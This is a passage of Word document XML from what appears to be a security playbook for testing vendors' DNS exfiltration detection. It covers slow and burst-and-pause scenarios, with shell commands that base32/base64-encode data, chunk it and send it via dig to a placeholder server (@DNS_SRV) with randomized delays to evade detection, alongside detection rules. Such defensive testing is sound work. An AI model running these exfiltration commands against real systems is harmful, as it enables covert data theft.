        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1CDA6449" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01460D21" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>30–120 seconds between queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="078628F9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="79AD2C41" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Chunk Size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0387B061" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>15 characters (small)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="18A8690A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="40DE809E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32F91506" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Mimics legitimate slow DNS traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FD260A7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D2AD1B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71478E64" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is how real APT groups exfiltrate data. One query every 30 seconds to 2 minutes, with a small payload per query. At this rate, exfiltrating 2KB of data takes hours — but the attacker has time. Each individual query looks unremarkable. It is only when </w:t>
      </w:r>
      <w:r>
        <w:t>you correlate all queries to the same novel destination domain over a long period that the pattern becomes visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612E8B43" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A169C6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863A201"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base32 | tr -d '=\n' | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614AC85E"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tr '</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[:upper</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:]' '[:lower:]' | fold -w 15 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF5AD58"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4807D1B9"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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  dig +short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F058E5B"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30-120 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43332555"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1C2BF37D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D28D26F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="E67E22"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFF3CD"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t>⚠</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E67E22"/>
        </w:rPr>
        <w:t xml:space="preserve"> WARNING: </w:t>
      </w:r>
      <w:r>
        <w:t>This scenario will take significant time to complete. For the vendor meeting, start it running at the beginning and check results at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DC5DE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3C8B72" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rule Required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B2212" w14:paraId="27DA1291" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="6CBE7E4A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="62FFC09C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="088D17E3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="3478879C" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="740719DE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4F7847A4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Long-horizon exfil accumulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5461514B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rolling 24h window: &gt;20 queri</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>es with entropy &gt;3.5 to same never-before-seen domain from same source → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EF72B97" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4FF102" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="0" w:color="C0392B"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8D7DA"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t>⛔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
        </w:rPr>
        <w:t xml:space="preserve"> IMPORTANT: </w:t>
      </w:r>
      <w:r>
        <w:t>Tell the vendor: 'If your tool cannot detect this within 24 hours, an attacker has a full day to exfiltrate data unchallenged. This is the scenario that separates mature detection from checkbox compliance.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DDB990" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="49248900" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.4 Scenario 9: Burst-and-Pause Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A8ADFA"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B2212" w14:paraId="2BFC96D6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="772715A7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Attrib</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="31768C99" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="29B82AA5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14334DA3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Threat Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0F361B0B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6DC4A3D7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1948D7E2" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A8EA7B6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="43E8108B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2BCE6E2F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Timing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2965DD50" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5 fast queries, then 60–180 second pause, repeat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="7DEB198B" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="38CF6D1A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="089958AA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Mimics application update check patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F3FD4A5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECD8E31" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How DNS Works in This Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4B5E1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Many legitimate applications perform periodic DNS lookups in bursts — a software update check that resolves multiple subdomains at once, then goes silent. This scenario mimics that pattern: a short burst of 5 queries with only 1–3 seconds between them, the</w:t>
      </w:r>
      <w:r>
        <w:t>n a long pause of 1–3 minutes. Rate-based detection that uses short windows sees the burst and then resets during the pause. Entropy-based rules should still catch it, but the burst-pause pattern may confuse behavioral models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41526EE7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127558A1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD5E19E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>COUNT=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D4F07"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base64 | tr -d '\n' | fold -w 40 | \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D9735"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6D6EBA05"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+short "${chunk</w:t>
      </w:r>
      <w:proofErr w:type="gram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 @DNS_SRV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE355FD"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COUNT=$((COUNT+1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66B4A2"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if [ $((COUNT % 5)) -eq </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0 ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C9001"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 Long pause every 5 queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D5897"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>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60-180 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C9E14"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D293D9B"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 Short delay within burst</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D4311"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1-3 -n 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D72C268"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36990AD0"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2840B14B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DE5B05" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rule Required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B2212" w14:paraId="5FE31302" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="7156A14F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="23775361" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
